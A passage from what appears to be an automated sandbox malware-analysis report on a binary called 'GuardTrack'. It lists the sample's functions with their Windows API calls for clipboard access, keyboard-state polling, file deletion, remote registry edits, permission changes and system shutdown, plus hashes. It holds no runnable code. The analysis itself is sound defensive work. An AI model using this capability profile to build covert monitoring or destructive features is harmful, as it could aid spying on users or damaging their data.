Opcode Fuzzy Hash: e2dd2abec9000305ecb65448176fb424230031d8552921307dbe08ab4cff4702
Instruction Fuzzy Hash: EB81687594021ABFEF159FA4DC49AEF7B7BEF05304F044159F911A22A2DB318E159B20

Function 00624632 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00640980), ref: 0062465C
IsClipboardFormatAvailable.USER32(0000000D), ref: 0062466A
GetClipboardData.USER32(0000000D), ref: 00624672
CloseClipboard.USER32 ref: 0062467E
GlobalLock.KERNEL32(00000000), ref: 0062469A
CloseClipboard.USER32 ref: 006246A4
GlobalUnlock.KERNEL32(00000000,00000000), ref: 006246B9
IsClipboardFormatAvailable.USER32(00000001), ref: 006246C6
GetClipboardData.USER32(00000001), ref: 006246CE
GlobalLock.KERNEL32(00000000), ref: 006246DB
GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 0062470F
CloseClipboard.USER32 ref: 0062481F

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 186f9e7d88c21aa855fc3d10e494dbc5ab013c0845d841bca591f6569bb12cc5
Instruction ID: 8d8821ef218f9f12971a4e5e8918573466010f1a3a7f3e157e80f1ef9fde6586
Opcode Fuzzy Hash: 186f9e7d88c21aa855fc3d10e494dbc5ab013c0845d841bca591f6569bb12cc5
Instruction Fuzzy Hash: 2951A235244622AFE700EF60EC49F6E77AAAF85B00F00052DF656D62D2DF70D9058F66

Function 0061F5D8 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0061F5F9
_wcscmp.LIBCMT ref: 0061F60E
_wcscmp.LIBCMT ref: 0061F625
GetFileAttributesW.KERNEL32(?), ref: 0061F637
SetFileAttributesW.KERNEL32(?,?), ref: 0061F651
FindNextFileW.KERNEL32(00000000,?), ref: 0061F669
FindClose.KERNEL32(00000000), ref: 0061F674
FindFirstFileW.KERNEL32(*.*,?), ref: 0061F690
_wcscmp.LIBCMT ref: 0061F6B7
_wcscmp.LIBCMT ref: 0061F6CE
SetCurrentDirectoryW.KERNEL32(?), ref: 0061F6E0
SetCurrentDirectoryW.KERNEL32(0066B578), ref: 0061F6FE
FindNextFileW.KERNEL32(00000000,00000010), ref: 0061F708
FindClose.KERNEL32(00000000), ref: 0061F715
FindClose.KERNEL32(00000000), ref: 0061F727

Strings

Sa, xrefs: 0061F6E2
*.*, xrefs: 0061F68B

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*$Sa
API String ID: 1803514871-3198783846
Opcode ID: 2d80bb0b985e1ce4a81d58a6da127afc7c8bfdb31c59dc6092be5517d757f4c7
Instruction ID: 5f59bd18dba2444802d97747ffad6dd311ec8a31f07eec65ba9ad35347063568
Opcode Fuzzy Hash: 2d80bb0b985e1ce4a81d58a6da127afc7c8bfdb31c59dc6092be5517d757f4c7
Instruction Fuzzy Hash: 8931E875640219ABEB10DFB4EC5DADE77AEAF0A321F144166F904D32E0DB70DA84CA60

Function 0061CD9F Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0061CDD0
FindClose.KERNEL32(00000000), ref: 0061CE24
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0061CE49
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0061CE60
FileTimeToSystemTime.KERNEL32(?,?), ref: 0061CE87
__swprintf.LIBCMT ref: 0061CED3
__swprintf.LIBCMT ref: 0061CF16

Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77

__swprintf.LIBCMT ref: 0061CF6A

Part of subcall function 005D38C8: __woutput_l.LIBCMT ref: 005D3921

__swprintf.LIBCMT ref: 0061CFB8

Part of subcall function 005D38C8: __flsbuf.LIBCMT ref: 005D3943
Part of subcall function 005D38C8: __flsbuf.LIBCMT ref: 005D395B

__swprintf.LIBCMT ref: 0061D007
__swprintf.LIBCMT ref: 0061D056
__swprintf.LIBCMT ref: 0061D0A5

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 0061CECD
%4d, xrefs: 0061CF10
%02d, xrefs: 0061CF5E, 0061CF68, 0061CFB6, 0061D005, 0061D054, 0061D0A3

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 46b6d35891520abcd5e74d23f291128a03ae87ced279488ba7731d7166b347b4
Instruction ID: e7ff7e1260ccff0be8005ede6e1b049982e17c72eb51f920b60dddc7bd03c63b
Opcode Fuzzy Hash: 46b6d35891520abcd5e74d23f291128a03ae87ced279488ba7731d7166b347b4
Instruction Fuzzy Hash: 3DA11FB1404205AFD710EFA4C989DAFBBEDFF95704F400919F585C6192EB70EA45CB62

Function 00630EB7 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00630FB3
RegCreateKeyExW.ADVAPI32(?,?,00000000,00640980,00000000,?,00000000,?,?), ref: 00631021
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00631069
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 006310F2
RegCloseKey.ADVAPI32(?), ref: 00631412
RegCloseKey.ADVAPI32(00000000), ref: 0063141F

Strings

REG_BINARY, xrefs: 006313AD
REG_SZ, xrefs: 00631130
REG_DWORD, xrefs: 006312E3
REG_MULTI_SZ, xrefs: 006311DA
REG_EXPAND_SZ, xrefs: 0063108F
REG_QWORD, xrefs: 00631360

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 902d44162ebaaa1a1b5e7143ba185cf72848b488283834825318ca9e15528dec
Instruction ID: cd941f8b05999b83b9ded7e74628704415f2df18b411394e21f6e5ba29bce117
Opcode Fuzzy Hash: 902d44162ebaaa1a1b5e7143ba185cf72848b488283834825318ca9e15528dec
Instruction Fuzzy Hash: AE025B752006129FC724EF24C845E6ABBE6FF89714F04895DF99A9B362CB30ED41CB91

Function 0061F735 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0061F756
_wcscmp.LIBCMT ref: 0061F76B
_wcscmp.LIBCMT ref: 0061F782

Part of subcall function 00614875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00614890

FindNextFileW.KERNEL32(00000000,?), ref: 0061F7B1
FindClose.KERNEL32(00000000), ref: 0061F7BC
FindFirstFileW.KERNEL32(*.*,?), ref: 0061F7D8
_wcscmp.LIBCMT ref: 0061F7FF
_wcscmp.LIBCMT ref: 0061F816
SetCurrentDirectoryW.KERNEL32(?), ref: 0061F828
SetCurrentDirectoryW.KERNEL32(0066B578), ref: 0061F846
FindNextFileW.KERNEL32(00000000,00000010), ref: 0061F850
FindClose.KERNEL32(00000000), ref: 0061F85D
FindClose.KERNEL32(00000000), ref: 0061F86F

Strings

ja, xrefs: 0061F82A
*.*, xrefs: 0061F7D3

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*$ja
API String ID: 1824444939-311970705
Opcode ID: 9080c246cf6b4c2a95f12131e69a6e93a960f8f6d002c5d6ecdaabed0cb19b17
Instruction ID: 365ac81ec9f43add29d084f062b288d3bfecb77c7233f99b40a78b88a442179d
Opcode Fuzzy Hash: 9080c246cf6b4c2a95f12131e69a6e93a960f8f6d002c5d6ecdaabed0cb19b17
Instruction Fuzzy Hash: D431C97550061ABAEB20DF74DC48ADE77BEDF46321F184175F905D22E0D770DA85CA60

Function 006088CD Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00608E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00608E3C
Part of subcall function 00608E20: GetLastError.KERNEL32(?,00608900,?,?,?), ref: 00608E46
Part of subcall function 00608E20: GetProcessHeap.KERNEL32(00000008,?,?,00608900,?,?,?), ref: 00608E55
Part of subcall function 00608E20: HeapAlloc.KERNEL32(00000000,?,00608900,?,?,?), ref: 00608E5C
Part of subcall function 00608E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00608E73

Part of subcall function 00608EBD: GetProcessHeap.KERNEL32(00000008,00608916,00000000,00000000,?,00608916,?), ref: 00608EC9
Part of subcall function 00608EBD: HeapAlloc.KERNEL32(00000000,?,00608916,?), ref: 00608ED0
Part of subcall function 00608EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00608916,?), ref: 00608EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00608931
_memset.LIBCMT ref: 00608946
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00608965
GetLengthSid.ADVAPI32(?), ref: 00608976
GetAce.ADVAPI32(?,00000000,?), ref: 006089B3
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006089CF
GetLengthSid.ADVAPI32(?), ref: 006089EC
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 006089FB
HeapAlloc.KERNEL32(00000000), ref: 00608A02
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00608A23
CopySid.ADVAPI32(00000000), ref: 00608A2A
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00608A5B
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00608A81
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00608A95

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 83a2f4f267ece0c5ae50dc6c8a25deded5a99fabfc61d5802dbb9e86c7134458
Instruction ID: a9224dfa2f0217ff74f3d5e070510017d0f3c2b2f5cf20353fdd7ac619e04544
Opcode Fuzzy Hash: 83a2f4f267ece0c5ae50dc6c8a25deded5a99fabfc61d5802dbb9e86c7134458
Instruction Fuzzy Hash: D9615675A40219FFDF04DFA5DC85AEEBB7AFF05300F04822AE955A7290DB319A04CB60

Function 00630A3A Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0063147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0063040D,?,?), ref: 00631491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00630B0C

Part of subcall function 005B4D37: __itow.LIBCMT ref: 005B4D62
Part of subcall function 005B4D37: __swprintf.LIBCMT ref: 005B4DAC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00630BAB
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00630C43
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00630E82
RegCloseKey.ADVAPI32(00000000), ref: 00630E8F

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 81e9c72a03b552e6def11608c6ce0d14342f0c0be79d855db67d469e8ca406aa
Instruction ID: 1010062ceb6f12148fac717f524c1b4bd5ee1ac14cba8cf270ca4884d03ad37c
Opcode Fuzzy Hash: 81e9c72a03b552e6def11608c6ce0d14342f0c0be79d855db67d469e8ca406aa
Instruction Fuzzy Hash: F1E15E35204211AFD714DF24C895E6BBBEAFF89714F04896DF44ADB2A2DA31EC05CB91

Function 00610508 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00610530
GetAsyncKeyState.USER32(000000A0), ref: 006105B1
GetKeyState.USER32(000000A0), ref: 006105CC
GetAsyncKeyState.USER32(000000A1), ref: 006105E6
GetKeyState.USER32(000000A1), ref: 006105FB
GetAsyncKeyState.USER32(00000011), ref: 00610613
GetKeyState.USER32(00000011), ref: 00610625
GetAsyncKeyState.USER32(00000012), ref: 0061063D
GetKeyState.USER32(00000012), ref: 0061064F
GetAsyncKeyState.USER32(0000005B), ref: 00610667
GetKeyState.USER32(0000005B), ref: 00610679

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: d3ef597f6cb1db72fa25c16774b4f0c1253d017f5bc736596ffaacac1b7bd923
Instruction ID: 027736a361aef12950840f8aa7ee0f597fa6007a4fe83c7363e5fa3d19ad7d34
Opcode Fuzzy Hash: d3ef597f6cb1db72fa25c16774b4f0c1253d017f5bc736596ffaacac1b7bd923
Instruction Fuzzy Hash: C941A5645047CA6DFF3187648A043F5BEA3AB52304F0C505AD6C6467C2EAE499D8CFE2

Function 0061443D Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00614451
__swprintf.LIBCMT ref: 0061445E

Part of subcall function 005D38C8: __woutput_l.LIBCMT ref: 005D3921

FindResourceW.KERNEL32(?,?,0000000E), ref: 00614488
LoadResource.KERNEL32(?,00000000), ref: 00614494
LockResource.KERNEL32(00000000), ref: 006144A1
FindResourceW.KERNEL32(?,?,00000003), ref: 006144C1
LoadResource.KERNEL32(?,00000000), ref: 006144D3
SizeofResource.KERNEL32(?,00000000), ref: 006144E2
LockResource.KERNEL32(?), ref: 006144EE
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0061454F

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: bc611327becbed602264e0837fbc329d00e360866b8d6e4b8d8e1651d368ec72
Instruction ID: af1c67798debe4cee357fe99a1d2fa6f5f876e8a7e526cb6fab47e5270c19caf
Opcode Fuzzy Hash: bc611327becbed602264e0837fbc329d00e360866b8d6e4b8d8e1651d368ec72
Instruction Fuzzy Hash: 0031907550122AAFEB119FA0EC48AFB7BABFF09301F044415F915D7250DB70DA91DB60

Function 00624830 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00624857
EmptyClipboard.USER32 ref: 0062485D
GlobalAlloc.KERNEL32(00000002,?), ref: 00624872
CloseClipboard.USER32 ref: 00624911

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 29149852f4a2129d2ab20e81deb26c6d188e3ed7f818d4cf40fd7f263e4e2148
Instruction ID: b88162372c855aaaad4b1238e6fea8bd207d89a6611a44bcb6b7255d6326b731
Opcode Fuzzy Hash: 29149852f4a2129d2ab20e81deb26c6d188e3ed7f818d4cf40fd7f263e4e2148
Instruction Fuzzy Hash: D121B7356056219FEB11AF20EC09B6E7BAAFF85711F018019FA06973A2CB74ED51CF94

Function 00613CE2 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 005D0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005C2A58,?,00008000), ref: 005D02A4

Part of subcall function 00614FEC: GetFileAttributesW.KERNEL32(?,00613BFE), ref: 00614FED

FindFirstFileW.KERNEL32(?,?), ref: 00613D96
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00613E3E
MoveFileW.KERNEL32(?,?), ref: 00613E51
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00613E6E
FindNextFileW.KERNEL32(00000000,00000010), ref: 00613E90
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00613EAC

Strings

\*.*, xrefs: 00613D41, 00613D4A, 00613D5F

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 6f2725f6e969fce9d92fe577d25274e84a0dcfdfa2d7b7d22d07b5270e470c2c
Instruction ID: 8b836a9ad3175e313e5b30ce2e6b36f5e7d138ee2bc0e7fe2c3f405dc55d32f0
Opcode Fuzzy Hash: 6f2725f6e969fce9d92fe577d25274e84a0dcfdfa2d7b7d22d07b5270e470c2c
Instruction Fuzzy Hash: 5151A53580121E9ECF15EBE0CA56EEDBB7AAF52300F244169E442B7292DF315F49CB64

Function 0061FA36 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0061FA83
FindClose.KERNEL32(00000000), ref: 0061FB96

Part of subcall function 005B52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005B52E6

Sleep.KERNEL32(0000000A), ref: 0061FAB3
_wcscmp.LIBCMT ref: 0061FAC7
_wcscmp.LIBCMT ref: 0061FAE2
FindNextFileW.KERNEL32(?,?), ref: 0061FB80

Strings

*.*, xrefs: 0061FA68

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
String ID: *.*
API String ID: 2185952417-438819550
Opcode ID: 38ff61fb39805e8349fb17bc271ad4c465bcaebfeca0830760ace9d41cb2c9c1
Instruction ID: ca1e22fbce690d65a5002541bcf7908c15f6868043cf7c7c4b020439d050736c
Opcode Fuzzy Hash: 38ff61fb39805e8349fb17bc271ad4c465bcaebfeca0830760ace9d41cb2c9c1
Instruction Fuzzy Hash: 2941A67190421A9FDF14DFA4CC59AEEBBB6FF05350F18416AF815A3291EB319E84CB50

Function 00614005 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 005D0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005C2A58,?,00008000), ref: 005D02A4

Part of subcall function 00614FEC: GetFileAttributesW.KERNEL32(?,00613BFE), ref: 00614FED

FindFirstFileW.KERNEL32(?,?), ref: 0061407C
DeleteFileW.KERNEL32(?,?,?,?), ref: 006140CC
FindNextFileW.KERNEL32(00000000,00000010), ref: 006140DD
FindClose.KERNEL32(00000000), ref: 006140F4
FindClose.KERNEL32(00000000), ref: 006140FD

Strings

\*.*, xrefs: 0061404E

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: c7516a84f5c8c403d742774755c8abba67b08e8c98b0b424be9b4f854ae427ab
Instruction ID: 021da05c71ee180c4fce83ff0be58a3aa99dab3c1b1ae8684dd568daacaca294
Opcode Fuzzy Hash: c7516a84f5c8c403d742774755c8abba67b08e8c98b0b424be9b4f854ae427ab
Instruction Fuzzy Hash: 7D316F350093969FC300EBA4C899DEFBBA9BE96305F440A2DF5D183292DB719A09C756

Function 00615778 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00609399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006093E3
Part of subcall function 00609399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00609410
Part of subcall function 00609399: GetLastError.KERNEL32 ref: 0060941D

ExitWindowsEx.USER32(?,00000000), ref: 006157B4

Strings

@, xrefs: 006157A7
SeShutdownPrivilege, xrefs: 00615784
, xrefs: 006157A2

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
